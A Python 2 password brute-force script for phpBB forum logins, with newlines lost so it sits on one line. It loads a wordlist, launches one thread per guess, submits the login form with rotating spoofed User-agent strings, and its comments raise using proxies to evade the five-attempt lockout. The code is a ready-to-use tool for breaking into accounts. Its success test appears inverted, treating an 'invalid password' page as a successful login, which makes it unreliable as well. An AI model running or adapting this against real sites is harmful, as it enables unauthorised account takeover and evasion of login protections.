#!usr/bin/python #phpBB Brute Forcer POC #POC because of the 5 login attempts for 30 min, proxies? # #To use this script you need ClientCookie and Client Form. #http://wwwsearch.sourceforge.net/ClientCookie/src/ClientCookie-1.0.3.tar.gz #http://wwwsearch.sourceforge.net/ClientForm/src/ClientForm-0.1.17.tar.gz #To install the package, run the following command: #python setup.py build #then (with appropriate permissions) #python setup.py install #http://www.darkc0de.com #d3hydr8[at]gmail[dot]com import threading, time, random, sys, socket, httplib, re try: sys.path.append('ClientCookie-1.0.3') import ClientCookie sys.path.append('ClientForm-0.1.17') import ClientForm except(ImportError): print "\nTo use this script you need ClientCookie and Client Form." print "Read the top intro for instructions.\n" sys.exit(1) from copy import copy if len(sys.argv) !=4: print "Usage: ./phpBBbrute.py " sys.exit(1) try: words = open(sys.argv[3], "r").readlines() except(IOError): print "Error: Check your wordlist path\n" sys.exit(1) print "\n\t d3hydr8[at]gmail[dot]com phpBBBruteForcer v1.0" print "\t--------------------------------------------------\n" print "[+] Server:",sys.argv[1] print "[+] User:",sys.argv[2] print "[+] Words Loaded:",len(words),"\n" headers = ["Mozilla/5.0 (compatible)", "Mozilla/4.0 (compatible; MSIE 5.5; Windows NT)", "Mozilla/4.0 (compatible; MSIE 5.5; Windows NT)", "Windows-RSS-Platform/1.0 (MSIE 7.0; Windows NT 5.1)", "Windows NT 6.0 (MSIE 7.0)", "Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0)", "Windows NT 4.0 (MSIE 5.0)"] wordlist = copy(words) def reloader(): for word in wordlist: words.append(word) def getword(): lock = threading.Lock() lock.acquire() if len(words) != 0: value = random.sample(words, 1) words.remove(value[0]) else: print "Reloading Wordlist\n" reloader() value = random.sample(words, 1) lock.release() return value[0] class Worker(threading.Thread): def run(self): global success value = getword() try: print "-"*12 print "User:",sys.argv[2],"Password:",value cookieJar = ClientCookie.CookieJar() opener = ClientCookie.build_opener(ClientCookie.HTTPCookieProcessor(cookieJar)) opener.addheaders = [("User-agent", random.sample(headers, 1)[0])] ClientCookie.install_opener(opener) fp = ClientCookie.urlopen(sys.argv[1]) forms = ClientForm.ParseResponse(fp) form = forms[0] form["username"] = sys.argv[2] form["password"] = value fp = ClientCookie.urlopen(form.click()) site = fp.readlines() for line in site: if re.search("invalid password", line.lower()) != None: print "\tSuccessful Login:", value print line success = value sys.exit(1) if re.search("The maximum number of 5 login attempts has been exceeded.",line): print "Attempts exceeded" fp.close() except(socket.gaierror), msg: pass for i in range(len(words)): work = Worker() work.start() time.sleep(1) time.sleep(3) try: if success: print "\n\n[+] Successful Login:",sys.argv[1] print "[+] User:",sys.argv[2]," Password:",success except(NameError): print "\n[+] Couldn't find correct password" pass print "\n[+] Done\n"